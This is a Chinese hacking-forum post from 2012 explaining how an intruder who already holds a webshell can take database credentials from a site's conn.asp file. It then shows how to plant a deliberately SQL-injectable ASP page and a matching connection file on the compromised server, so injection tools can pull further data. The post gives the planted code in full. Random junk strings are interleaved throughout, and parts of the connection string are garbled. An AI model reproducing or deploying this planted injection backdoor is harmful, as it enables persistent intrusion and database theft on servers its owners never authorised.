中国网络渗透测试联盟
标题:
自己构造注入点方便入侵
[打印本页]
作者:
admin
时间:
2012-9-13 17:27
标题:
自己构造注入点方便入侵
自己构造注入点方便入侵
- \) |) o) j# L- U
; _0 N4 R5 A) L) ~: {
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
6 H4 C. J. N7 Z$ I! _+ W/ s
4 C: r% Z! @6 D" P
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
2 h5 i0 e/ d7 A5 o% d' [
6 E. w' h& e; `; Z! S
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
( L. U% ?6 D* o1 F
: k% `' E% s8 p Q, u( `' G
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
% o8 N& Z6 `* e6 V* I, t4 z
6 T" ?$ E7 d7 _. ]
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
: ~" k: ?: n$ m6 }% j
3 {- i/ D. H: D1 B
程序代码
0 j4 D! X6 A- d; z8 V( P. r
<!--#include file="xx.asp"-->
- {7 A+ T) s* i* g* O3 S& t( O
<%
0 C/ U# {2 e, m) D
set rs=server.createobject("ADODB.recordset")
. m' K* c' {# x5 o
id = request("id")
" j) C x o; T2 E" t0 o" [
strSQL = "select * from admin where id=" & id
- f& F4 j: s) z% V2 M# O% ]% |
rs.open strSQL,conn,1,3
7 z! U! i, ?0 r4 M
rs.close
7 W, h, x. x' O( Y5 X& |2 V
%>
8 O; \( V: y! e7 C7 e
2 b# P- A7 a. @2 i8 y6 i) E. A
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
& b2 t! K( {7 M5 f: F
, U7 s. h) F! p& M7 p
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
. j- l$ M9 G! `
: N) G) i+ f6 w) E$ B& i9 z+ Q6 u7 r
然后就要构造一个连接数据库的文件了,代码如下:
% C7 x% P. _0 T1 h" G
程序代码
+ k3 t1 l: {5 A4 q# K- y1 p
<%
* ?1 c U, B! X/ i& r. j" i1 P7 |
strSQLServerName = "000.000.000.000" '服务器名称或地址
( U+ A/ p4 ^, v- y3 C) x$ M I
strSQLDBUserName = "sqlname" '数据库帐号
% C* I- h. C/ q0 q4 G1 m
strSQLDBPassword = "sqlpass" '数据库密码
+ M, Y8 f0 I: l# W- [
strSQLDBName = "sqldataname" '数据库名称
+ {0 `( ^* b1 s/ f! ?
Set conn = Server.CreateObject("ADODB.Connection")
t# s6 n( R& i j
strCon = "
rovider=SQLOLEDB.1
ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "
assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
; Z1 t" U' Z1 o) x8 E6 W
conn.open strCon
. S. A+ x% w$ r8 |3 s( l' W( Y
%>
# j) s! M" G) T8 U7 H- o; K7 N
' I+ G- p+ N0 G3 w. L+ D9 E
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
$ U9 B% `( W9 R3 v5 j
* I" W6 D- M v$ y9 `
就这样,正常情况下,就OK了,伪造成功……
8 Q0 W9 ?7 |! ~& ^4 T
) o! q+ L% B+ `, ?# M3 @
如果有什么问题可以提出来大家一起探讨解决。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2